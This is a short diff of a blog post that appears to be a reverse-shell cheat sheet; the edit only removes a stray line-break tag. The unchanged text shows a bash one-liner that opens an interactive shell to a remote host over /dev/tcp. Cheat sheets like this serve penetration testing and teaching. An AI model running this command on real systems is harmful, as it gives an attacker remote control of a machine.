Ruuucker/Ruuucker.github.io/_posts/cheatsheets/2015-06-01-Reverse-Shells.md

 # Bash

-Some versions of bash can send you a reverse <br> shell (this was tested on Ubuntu 10.10):
+Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

 	bash -i >& /dev/tcp/10.0.0.1/8080 0>&1